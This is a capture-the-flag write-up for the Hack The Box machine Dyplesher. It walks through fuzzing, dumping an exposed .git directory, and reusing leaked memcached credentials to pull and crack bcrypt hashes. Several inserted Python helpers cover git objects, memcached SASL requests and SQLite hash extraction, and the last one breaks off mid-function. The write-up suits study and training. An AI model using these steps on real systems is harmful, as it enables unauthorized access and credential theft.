Dyplesher HTB writeup
Dyplesher was my very first Insane Hack The Box machine. It drove me nuts to find the initial foothold, while root wasn't much harder than on a medium/hard box.

Enum

Enumeration was where I spent most of the time: I kept looking in the wrong places and ignoring the right ones.

NMAP results

In the Nmap results below we can see SSH, HTTP, EPMD, AMQP (RabbitMQ), Memcached and a Minecraft server, plus an unknown service on port 3000. Port 25672 is the Erlang distribution port of the rabbit node (epmd reports it in the script scan further down), and port 3000 turns out to be a Gogs instance.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 18:11 CEST
Initiating Ping Scan at 18:11
Scanning 10.10.10.190 [2 ports]
Completed Ping Scan at 18:11, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 18:11
Scanning 10.10.10.190 [65535 ports]
Discovered open port 22/tcp on 10.10.10.190
Discovered open port 80/tcp on 10.10.10.190
Discovered open port 4369/tcp on 10.10.10.190
Discovered open port 25672/tcp on 10.10.10.190
Discovered open port 25562/tcp on 10.10.10.190
Connect Scan Timing: About 43.48% done; ETC: 18:12 (0:00:40 remaining)
Discovered open port 25565/tcp on 10.10.10.190
Discovered open port 5672/tcp on 10.10.10.190
Discovered open port 3000/tcp on 10.10.10.190
Discovered open port 11211/tcp on 10.10.10.190
Completed Connect Scan at 18:12, 54.76s elapsed (65535 total ports)
Nmap scan report for 10.10.10.190
Host is up (0.038s latency).
Not shown: 65525 filtered ports, 1 closed port
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3000/tcp  open  ppp
4369/tcp  open  epmd
5672/tcp  open  amqp
11211/tcp open  memcache
25562/tcp open  unknown
25565/tcp open  minecraft
25672/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 54.82 seconds
Version detection and the default scripts against the open ports:
[*] Running NMAP scripts to open ports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-24 18:12 CEST
Nmap scan report for 10.10.10.190
Host is up (0.037s latency).

PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 7e:ca:81:78:ec:27:8f:50:60:db:79:cf:97:f7:05:c0 (RSA)
|   256 e0:d7:c7:9f:f2:7f:64:0d:40:29:18:e1:a1:a0:37:5e (ECDSA)
|_  256 9f:b2:4c:5c:de:44:09:14:ce:4f:57:62:0b:f9:71:81 (ED25519)
80/tcp    open  http      Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Dyplesher
3000/tcp  open  ppp?
| fingerprint-strings:
|   GenericLines, Help:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=fb94a4c063bb0bd3; Path=/; HttpOnly
|     Set-Cookie: _csrf=iJaOmeRYfWmehMyijQzQEZ3Jk706MTU5MDMzNjc3Njg3Njg2NTM0MA%3D%3D; Path=/; Expires=Mon, 25 May 2020 16:12:56 GMT; HttpOnly
|     Date: Sun, 24 May 2020 16:12:56 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="iJaOmeRYfWmehMyijQzQEZ3Jk706MTU5MDMzNjc3Njg3Njg2NTM0MA==" />
|     <meta name="_suburl" content="" />
|     <meta proper
|   HTTPOptions:
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gogs=86eefb03b61a9160; Path=/; HttpOnly
|     Set-Cookie: _csrf=HaCJKx5FnpbpoM_whufwZ1x1Nb86MTU5MDMzNjc4MjA4NDk1MTU1MA%3D%3D; Path=/; Expires=Mon, 25 May 2020 16:13:02 GMT; HttpOnly
|     Date: Sun, 24 May 2020 16:13:02 GMT
|     <!DOCTYPE html>
|     <html>
|     <head data-suburl="">
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
|     <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
|     <meta name="author" content="Gogs" />
|     <meta name="description" content="Gogs is a painless self-hosted Git service" />
|     <meta name="keywords" content="go, git, self-hosted, gogs">
|     <meta name="referrer" content="no-referrer" />
|     <meta name="_csrf" content="HaCJKx5FnpbpoM_whufwZ1x1Nb86MTU5MDMzNjc4MjA4NDk1MTU1MA==" />
|     <meta name="_suburl" content="" />
|_    <meta
4369/tcp  open  epmd      Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|   nodes:
|_    rabbit: 25672
5672/tcp  open  amqp      RabbitMQ 3.7.8 (0-9)
| amqp-info:
|   capabilities:
|     publisher_confirms: YES
|     exchange_exchange_bindings: YES
|     basic.nack: YES
|     consumer_cancel_notify: YES
|     connection.blocked: YES
|     consumer_priorities: YES
|     authentication_failure_close: YES
|     per_consumer_qos: YES
|     direct_reply_to: YES
|   cluster_name: [email protected]
|   copyright: Copyright (C) 2007-2018 Pivotal Software, Inc.
|   information: Licensed under the MPL. See http://www.rabbitmq.com/
|   platform: Erlang/OTP 22.0.7
|   product: RabbitMQ
|   version: 3.7.8
|   mechanisms: PLAIN AMQPLAIN
|_  locales: en_US
11211/tcp open  memcache?
25562/tcp open  unknown
25565/tcp open  minecraft?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, LPDString, SIPOptions, SSLSessionReq, TLSSessionReq, afp, ms-sql-s, oracle-tns:
|     '{"text":"Unsupported protocol version"}
|   NotesRPC:
|     q{"text":"Unsupported protocol version 0, please use one of these versions:
|_    1.8.x, 1.9.x, 1.10.x, 1.11.x, 1.12.x"}
25672/tcp open  unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.97 seconds

Web fuzz results

I started by fuzzing the Gogs service, but found nothing usable with the low-privileged access available there.
After many hours of enumerating every web service with different wordlists, I finally got a hit with dirb's common.txt on the test.dyplesher.htb vhost:
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://test.dyplesher.htb/FUZZ -e .txt,.php,.html -t 300 -s

index.php
.hta.txt
.git/HEAD
.htpasswd
server-status

Foothold

Knowing that test.dyplesher.htb exposes a .git directory, I dumped everything I could with gogitdumper. The tool fetches the git objects and metadata over HTTP and rebuilds a repository on the local machine (directory listing is denied, hence the 403, but the individual files are still readable):
$ gogitdumper -u http://test.dyplesher.htb/.git/ -o test/.git/
====================
GoGitDumper V0.5.2
Poorly hacked together by C_Sto
====================
Error code: 403

Error during indexing test
Downloaded: http://test.dyplesher.htb/.git/index
Downloaded: http://test.dyplesher.htb/.git/objects/info/packs
Downloaded: http://test.dyplesher.htb/.git/objects/e6/9de29bb2d1d6434b8b29ae775ad8c2e48c5391
Downloaded: http://test.dyplesher.htb/.git/objects/27/29b565f353181a03b2e2edb030a0e2b33d9af0
Downloaded: http://test.dyplesher.htb/.git/HEAD
Downloaded: http://test.dyplesher.htb/.git/logs/refs/heads/master
Downloaded: http://test.dyplesher.htb/.git/config
Downloaded: http://test.dyplesher.htb/.git/logs/HEAD
Downloaded: http://test.dyplesher.htb/.git/logs/refs/remotes/origin/master
Downloaded: http://test.dyplesher.htb/.git/refs/remotes/origin/master
Downloaded: http://test.dyplesher.htb/.git/refs/heads/master
Downloaded: http://test.dyplesher.htb/.git/COMMIT_EDITMSG
Downloaded: http://test.dyplesher.htb/.git/description
Downloaded: http://test.dyplesher.htb/.git/hooks/applypatch-msg.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/commit-msg.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/post-update.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-applypatch.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-push.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/prepare-commit-msg.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-rebase.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-commit.sample
Downloaded: http://test.dyplesher.htb/.git/info/exclude
Downloaded: http://test.dyplesher.htb/.git/hooks/pre-receive.sample
Downloaded: http://test.dyplesher.htb/.git/hooks/update.sample
Downloaded: http://test.dyplesher.htb/.git/objects/b1/fe9eddcdf073dc45bb406d47cde1704f222388
Downloaded: http://test.dyplesher.htb/.git/objects/3f/91e452f3cbfa322a3fbd516c5643a6ebffc433
Once the files are local, git status shows what the index tracks. The dumper only rebuilds .git, not the checkout, so the tracked files appear as deleted from the working tree:
$ cd test
$ git status
On branch master
Your branch is up to date with 'origin/master'.

Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        deleted:    README.md
        deleted:    index.php

no changes added to commit (use "git add" and/or "git commit -a")
Both files can be restored from the object store with git checkout --:
git checkout -- README.md
git checkout -- index.php
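What the dumper plus git checkout actually do is worth seeing once without git in the loop. The following is an added example (my own code, not the write-up's or gogitdumper's): it builds a tiny repository the way git stores loose objects, then walks HEAD, the commit, the tree and the blobs to recover the file contents. The fixture repository, its file names and the snippet of PHP inside it are constructed stand-ins for the dumped test.dyplesher.htb repository; the object format and the walk are the real thing, which is why an exposed .git directory is equivalent to handing out the source.

```python
"""Rebuild files straight from loose git objects, as a .git dumper plus checkout does."""
from __future__ import annotations

import hashlib
import tempfile
import zlib
from pathlib import Path


def git_hash_object(kind: str, content: bytes) -> tuple[str, bytes]:
    """A loose object is "<type> <size>\\0<content>", named by its SHA-1, stored zlib-compressed."""
    raw = f"{kind} {len(content)}".encode() + b"\x00" + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def write_loose(git_dir: Path, kind: str, content: bytes) -> str:
    oid, packed = git_hash_object(kind, content)
    path = git_dir / "objects" / oid[:2] / oid[2:]
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(packed)
    return oid


def read_loose(git_dir: Path, oid: str) -> tuple[str, bytes]:
    """Inflate objects/xx/yyyy... and split header from body, checking the declared size."""
    raw = zlib.decompress((git_dir / "objects" / oid[:2] / oid[2:]).read_bytes())
    header, _, body = raw.partition(b"\x00")
    kind, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"corrupt object {oid}: declared {size} bytes, got {len(body)}")
    return kind, body


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Tree entries are "<mode> <name>\\0" followed by a raw 20-byte SHA-1, back to back."""
    entries, i = [], 0
    while i < len(body):
        nul = body.index(b"\x00", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def parse_commit(body: bytes) -> dict[str, str]:
    headers, _, message = body.partition(b"\n\n")
    info = {"message": message.decode()}
    for line in headers.decode().splitlines():
        key, _, value = line.partition(" ")
        info.setdefault(key, value)  # first "parent" wins; enough for this walk
    return info


def dump_files_from_head(git_dir: Path) -> dict[str, bytes]:
    """HEAD -> refs/heads/<branch> -> commit -> tree -> blobs (top-level files only)."""
    ref = (git_dir / "HEAD").read_text().strip().split("ref: ", 1)[1]
    commit_oid = (git_dir / ref).read_text().strip()
    kind, body = read_loose(git_dir, commit_oid)
    if kind != "commit":
        raise ValueError(f"{commit_oid} is a {kind}, not a commit")
    tree_oid = parse_commit(body)["tree"]
    files = {}
    for mode, name, oid in parse_tree(read_loose(git_dir, tree_oid)[1]):
        if mode.startswith("100"):  # regular file; "40000" would be a subdirectory tree
            files[name] = read_loose(git_dir, oid)[1]
    return files


# Constructed fixture standing in for the dumped test.dyplesher.htb/.git (contents are made up).
SAMPLE_INDEX_PHP = b"<?php\n$m = new Memcached();\n$m->setSaslAuthData(\"felamos\", \"REDACTED\");\n"
SAMPLE_README = b"# memcached test\n"


def build_sample_repo(git_dir: Path) -> str:
    """Write two blobs, one tree and one commit the way git would, and point HEAD at it."""
    blobs = {name: write_loose(git_dir, "blob", data)
             for name, data in (("README.md", SAMPLE_README), ("index.php", SAMPLE_INDEX_PHP))}
    tree = b"".join(f"100644 {name}".encode() + b"\x00" + bytes.fromhex(oid)
                    for name, oid in sorted(blobs.items()))
    tree_oid = write_loose(git_dir, "tree", tree)
    commit = (f"tree {tree_oid}\nauthor felamos <f@x> 0 +0000\n"
              f"committer felamos <f@x> 0 +0000\n\nadd memcached test page\n").encode()
    commit_oid = write_loose(git_dir, "commit", commit)
    (git_dir / "refs" / "heads").mkdir(parents=True, exist_ok=True)
    (git_dir / "refs" / "heads" / "master").write_text(commit_oid + "\n")
    (git_dir / "HEAD").write_text("ref: refs/heads/master\n")
    return commit_oid


def demo() -> dict[str, bytes]:
    git_dir = Path(tempfile.mkdtemp()) / ".git"
    build_sample_repo(git_dir)
    return dump_files_from_head(git_dir)


if __name__ == "__main__":
    for name, data in demo().items():
        print(f"--- {name} ---\n{data.decode()}")
```

Against a real dump you would point dump_files_from_head() at the downloaded .git; objects inside packfiles (objects/pack/*.pack) need a pack parser and are not handled here, which is also why dumpers fetch objects/info/packs.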
README.md had nothing useful, but index.php contains hard-coded SASL credentials for the memcached instance on port 11211 (the page takes an arbitrary key and value from the query string and writes them into the cache):
$ cat index.php

<HTML>
<BODY>
<h1>Add key and value to memcache<h1>
<FORM METHOD="GET" NAME="test" ACTION="">
<INPUT TYPE="text" NAME="add">
<INPUT TYPE="text" NAME="val">
<INPUT TYPE="submit" VALUE="Send">
</FORM>

<pre>
<?php
if($_GET['add'] != $_GET['val']){
    $m = new Memcached();
    $m->setOption(Memcached::OPT_BINARY_PROTOCOL, true);
    $m->setSaslAuthData("felamos", "XXXXXXXXXXXXX");
    $m->addServer('127.0.0.1', 11211);
    $m->add($_GET['add'], $_GET['val']);
    echo "Done!";
}
else {
    echo "its equal";
}
?>
</pre>

</BODY>
</HTML>
The repository config also points at a remote on the Gogs instance (localhost:3000), which hints at what felamos keeps on that git server:
$ cat .git/config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[remote "origin"]
        url = http://localhost:3000/felamos/memcached.git
        fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
        remote = origin
        merge = refs/heads/master

Memcached enumeration

With memcached credentials in hand, the next step is to enumerate the cache. The server requires SASL, which memcached only supports over its binary protocol, so the plain-text commands you would type into netcat or telnet cannot authenticate. libmemcached's tools (memcstat, memccat) speak the binary protocol with SASL, so I installed them and checked the server status first:
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190
Server: 10.10.10.190 (11211)
        pid: 1
        uptime: 1756
        time: 1591198925
        version: 1.6.5
        libevent: 2.1.8-stable
        ....
        ....
        lru_bumps_dropped: 0
That confirms the credentials work. Next, the slab statistics:
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190 --args slabs
Server: 10.10.10.190 (11211)
        1:chunk_size: 96
        1:chunks_per_page: 10922
        1:total_pages: 1
        1:total_chunks: 10922
        1:used_chunks: 1
        ....
        ....
        active_slabs: 4
        total_malloced: 4194304
Next, the item statistics: four slab classes each hold one item, so four keys are stored in total.
$ memcstat --username felamos --password XXXXXXXXX --servers 10.10.10.190 --args items
Server: 10.10.10.190 (11211)
        items:1:number: 1
        ....
        items:3:number: 1
        ....
        items:5:number: 1
        ....
        items:6:number: 1
        ....
Memcached gives a client no clean way to list keys (the usual trick, lru_crawler metadump, is a text-protocol command, and this server only talks the binary protocol because of SASL), so I could not enumerate them.
The remaining option was to guess key names: email, user, password and so on.
The key username existed and returned three users:
$ memccat --debug --username felamos --password XXXXXXXXX --servers 10.10.10.190 username
key: username
flags: 0
length: 24
value: MinatoTW
felamos
yuntao
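The binary-protocol framing behind those memcstat and memccat calls, as an added example (my own code, not the write-up's or libmemcached's): it builds the SASL PLAIN authentication request that index.php's setSaslAuthData() triggers, a GET and a STAT request, and parses the server's replies. The sample replies are constructed for the offline demo (the value mirrors the three usernames above); fetch_key() is the live version against a real server. It also makes the earlier point concrete: authentication is an opcode of the 24-byte-header binary protocol, so a text-protocol client never gets an authenticated session.

```python
"""Memcached binary protocol framing with SASL PLAIN authentication (client side)."""
import socket
import struct

REQ_MAGIC, RES_MAGIC = 0x80, 0x81
OP_GET, OP_STAT, OP_SASL_LIST_MECHS, OP_SASL_AUTH = 0x00, 0x10, 0x20, 0x21
STATUS_TEXT = {0x0000: "ok", 0x0001: "key not found", 0x0020: "auth error",
               0x0021: "further auth required", 0x0081: "unknown command"}
# 24-byte header: magic, opcode, key length, extras length, data type, vbucket (request) or
# status (response), total body length, opaque, CAS. All fields are big-endian.
HEADER = struct.Struct("!BBHBBHIIQ")


def build_request(opcode: int, key: bytes = b"", value: bytes = b"",
                  extras: bytes = b"", opaque: int = 0) -> bytes:
    body = extras + key + value
    return HEADER.pack(REQ_MAGIC, opcode, len(key), len(extras), 0, 0, len(body), opaque, 0) + body


def sasl_plain_auth(user: str, password: str) -> bytes:
    """SASL AUTH (0x21): the mechanism name is the key, the PLAIN token "authzid\\0authcid\\0password"
    is the value. This is the request PHP's setSaslAuthData() causes to be sent."""
    token = b"\x00" + user.encode() + b"\x00" + password.encode()
    return build_request(OP_SASL_AUTH, key=b"PLAIN", value=token)


def get_request(key: str) -> bytes:
    return build_request(OP_GET, key=key.encode())


def stat_request(arg: str = "") -> bytes:
    """STAT with an optional argument such as "slabs" or "items" (what memcstat --args sends)."""
    return build_request(OP_STAT, key=arg.encode())


def parse_response(data: bytes) -> dict:
    magic, opcode, key_len, extras_len, _, status, body_len, opaque, cas = HEADER.unpack_from(data)
    if magic != RES_MAGIC:
        raise ValueError(f"not a binary-protocol response (magic {magic:#x})")
    body = data[HEADER.size:HEADER.size + body_len]
    extras, key = body[:extras_len], body[extras_len:extras_len + key_len]
    value = body[extras_len + key_len:]
    flags = struct.unpack("!I", extras)[0] if len(extras) == 4 else None  # GET returns 4-byte flags
    return {"opcode": opcode, "status": status, "status_text": STATUS_TEXT.get(status, f"{status:#06x}"),
            "flags": flags, "key": key, "value": value, "cas": cas, "opaque": opaque}


def build_response(opcode: int, status: int = 0, key: bytes = b"", value: bytes = b"",
                   extras: bytes = b"") -> bytes:
    """Server-side framing, used here only to construct sample replies for offline testing."""
    body = extras + key + value
    return HEADER.pack(RES_MAGIC, opcode, len(key), len(extras), 0, status, len(body), 0, 0) + body


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-response")
        buf += chunk
    return buf


def recv_response(sock: socket.socket) -> dict:
    header = _recv_exact(sock, HEADER.size)
    body_len = HEADER.unpack(header)[6]
    return parse_response(header + _recv_exact(sock, body_len))


def fetch_key(host: str, port: int, user: str, password: str, key: str) -> dict:
    """Authenticate with SASL PLAIN, then GET one key (what memccat does). Live network call."""
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(sasl_plain_auth(user, password))
        auth = recv_response(sock)
        if auth["status"] != 0:
            raise PermissionError(f"SASL auth failed: {auth['status_text']} {auth['value']!r}")
        sock.sendall(get_request(key))
        return recv_response(sock)


# Constructed sample replies (not captured from the box).
SAMPLE_GET_REPLY = build_response(OP_GET, extras=b"\x00\x00\x00\x00", value=b"MinatoTW\nfelamos\nyuntao\n")
SAMPLE_AUTH_FAILURE = build_response(OP_SASL_AUTH, status=0x0020, value=b"Auth failure.")

if __name__ == "__main__":
    reply = parse_response(SAMPLE_GET_REPLY)
    print(reply["status_text"], reply["value"].decode().split())
    # fetch_key("10.10.10.190", 11211, "felamos", "<password>", "username")
```

If you send a text command such as "stats\r\n" to a SASL-enabled server, the first byte is not 0x80, so it is never parsed as a binary request; that is the whole reason nc and telnet get nowhere here.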
Since username worked, I tried password next, which returned three bcrypt hashes:
$ memccat --debug --username felamos --password XXXXXXXXX --servers 10.10.10.190 password
key: password
flags: 0
length: 182
value: $2a$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxJa
$2y$12$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxQK
$2a$10$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxlS
John the Ripper cracked one password out of the three hashes. Note that it reports only two hashes loaded (a line that duplicates another or is malformed is dropped silently; john --show lists what was actually cracked), and the two cost values it mentions, 1024 and 4096 iterations, are the $2a$10 and $2y$12 work factors, i.e. 2^10 and 2^12 rounds.
$ john passwd.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (bcrypt [Blowfish 32/64 X3])
Loaded hashes with cost 1 (iteration count) varying from 1024 to 4096
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxx         (?)

Gogs

The cracked password belonged to felamos and worked on the Gogs instance at http://10.10.10.190:3000.
Logged in as felamos there are two repositories: memcached, identical to what we dumped from test.dyplesher.htb, and gitlab.
The gitlab repository itself held nothing useful, but its release page offered a zip attachment: http://10.10.10.190:3000/attachments/a1b0e8bb-5843-4d5a-aff4-c7ee283e95f2
Unzipped, it contains an @hashed directory of git bundles, the layout GitLab's hashed storage uses (each repository is named after the SHA-256 of its numeric project ID). Each bundle can be cloned locally:
$ git clone ./@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
Cloning into '6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b'...
Receiving objects: 100% (85/85), 30.69 KiB | 30.69 MiB/s, done.
Resolving deltas: 100% (40/40), done.

$ git clone ./@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35
Cloning into 'd4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35'...
Receiving objects: 100% (21/21), 16.98 KiB | 16.98 MiB/s, done.
Resolving deltas: 100% (9/9), done.

$ git clone ./@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle 4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a
Cloning into '4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a'...
Receiving objects: 100% (39/39), 10.46 KiB | 10.46 MiB/s, done.
Resolving deltas: 100% (12/12), done.

$ git clone ./@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
Cloning into '4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce'...
Receiving objects: 100% (51/51), 20.94 MiB | 102.57 MiB/s, done.
Resolving deltas: 100% (5/5), done.
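Those 64-character directory names are not random. As an added example (my own code, not the write-up's or GitLab's), the script below reproduces GitLab's hashed storage rule, repository path = @hashed/d[0:2]/d[2:4]/d with d = SHA-256 of the decimal project ID, and uses it to map the four bundle paths listed above back to their project IDs by brute force, which is cheap because project IDs are small integers. The "project-N" checkout names it generates are my convention; the bundle paths are the ones from the backup zip.

```python
"""GitLab hashed storage: resolve @hashed/.../<sha256>.bundle paths back to project IDs."""
import hashlib
import re

BUNDLE_RE = re.compile(r"@hashed/([0-9a-f]{2})/([0-9a-f]{2})/([0-9a-f]{64})\.bundle$")


def project_digest(project_id: int) -> str:
    """SHA-256 of the decimal project ID, as GitLab computes it."""
    return hashlib.sha256(str(project_id).encode()).hexdigest()


def hashed_repo_path(project_id: int) -> str:
    d = project_digest(project_id)
    return f"@hashed/{d[:2]}/{d[2:4]}/{d}"


def bundle_path(project_id: int) -> str:
    """A GitLab backup stores each repository as <hashed path>.bundle."""
    return hashed_repo_path(project_id) + ".bundle"


def resolve_bundles(paths, max_id: int = 100_000) -> dict:
    """Map every @hashed bundle path to its project ID (None if no ID <= max_id matches)."""
    by_digest = {project_digest(i): i for i in range(1, max_id + 1)}
    resolved = {}
    for p in paths:
        m = BUNDLE_RE.search(p)
        if not m:
            continue
        prefix1, prefix2, digest = m.groups()
        if (digest[:2], digest[2:4]) != (prefix1, prefix2):
            raise ValueError(f"directory prefix does not match digest in {p}")
        resolved[p] = by_digest.get(digest)
    return resolved


def clone_commands(paths) -> list:
    """git clone lines naming each checkout after its project ID instead of the digest."""
    cmds = []
    for p, pid in sorted(resolve_bundles(paths).items(), key=lambda kv: (kv[1] is None, kv[1])):
        name = f"project-{pid}" if pid is not None else "unresolved-" + p.rsplit("/", 1)[1][:12]
        cmds.append(f"git clone ./{p} {name}")
    return cmds


# The four bundles from the backup zip, exactly as listed in the clone commands above.
PAGE_BUNDLES = [
    "@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.bundle",
    "@hashed/d4/73/d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35.bundle",
    "@hashed/4b/22/4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a.bundle",
    "@hashed/4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce.bundle",
]

if __name__ == "__main__":
    for cmd in clone_commands(PAGE_BUNDLES):
        print(cmd)
```

The repository that matters below, 4e07408562..., is project ID 3; the digest hides the project name but not the ID, so the @hashed layout offers no confidentiality once a backup leaks.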
That gives four repositories. After reviewing them, only 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce contained anything useful:
a LoginSecurity SQLite database with user credentials under plugins/LoginSecurity/users.db. cat-ing the binary file is ugly, but the schema and a bcrypt hash are readable in the output:
$ cat 4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/plugins/LoginSecurity/users.db

�00���ableusersusersCREATE TABLE users (unique_user_id VARCHAR(130) NOT NULL UNIQUE,password VARCHAR(300) NOT NULL,encryption INT,ip VARCHAR(130) NOT NULL))=indexsqlite_autoindex_users_1user��qM�)18fb40a5c8d34f249bb8a689914fcac3$2a$10$Ixxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxc6/192.168.43.81
��$M18fb40a5c8d34f249bb8a689914fcac3%
Opening the file in a SQLite browser (or the sqlite3 CLI) gives the clean hash, which john cracked with rockyou (bcrypt is cracked by guessing, not decrypted):
$ john db_pass.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxxxxx        (?)
1g 0:00:00:07 DONE (2020-06-03 20:02) 0.1404g/s 227.5p/s 227.5c/s 227.5C/s xxxxxxxxx..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed
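Doing the SQLite step in code instead of a GUI browser, as an added example (my own code, not the write-up's): it creates a users.db with the exact schema visible in the cat output, reads the rows back through sqlite3, turns them into user:hash lines john accepts, and falls back to scanning the raw bytes for bcrypt strings when the file is not a readable database (a truncated or partially overwritten copy). The row, the user ID reuse and the bcrypt-shaped hash are constructed; the encryption column value is a placeholder, since the page does not show LoginSecurity's algorithm IDs.

```python
"""Extract LoginSecurity credentials from users.db and prepare them for john."""
import re
import sqlite3
import tempfile
from pathlib import Path

# Schema exactly as it appears in the cat output of users.db.
SCHEMA = ("CREATE TABLE users (unique_user_id VARCHAR(130) NOT NULL UNIQUE,"
          "password VARCHAR(300) NOT NULL,encryption INT,ip VARCHAR(130) NOT NULL)")

# Modular-crypt bcrypt: $2a|2b|2y$<cost>$ + 22-char salt + 31-char hash = 60 characters.
BCRYPT_RE = re.compile(rb"\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}")

SAMPLE_HASH = "$2a$10$" + "abcdefghijklmnopqrstuv" + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcde"  # dummy, 22 + 31
SAMPLE_ROWS = [("18fb40a5c8d34f249bb8a689914fcac3", SAMPLE_HASH, 7, "192.168.43.81")]  # 7 is a placeholder


def build_sample_db(path: Path) -> None:
    with sqlite3.connect(path) as con:
        con.execute(SCHEMA)
        con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_ROWS)


def scan_raw_for_bcryp_bytes(data: bytes) -> list:
    """What `cat users.db | grep '\\$2'` effectively does: find bcrypt strings in the raw pages."""
    return BCRYPT_RE.findall(data)


def extract_hashes(path: Path) -> list:
    """(user id, hash) pairs via SQLite; raw-scan fallback if the file is not a valid database."""
    try:
        with sqlite3.connect(f"file:{path}?mode=ro", uri=True) as con:
            return con.execute("SELECT unique_user_id, password FROM users").fetchall()
    except sqlite3.DatabaseError:
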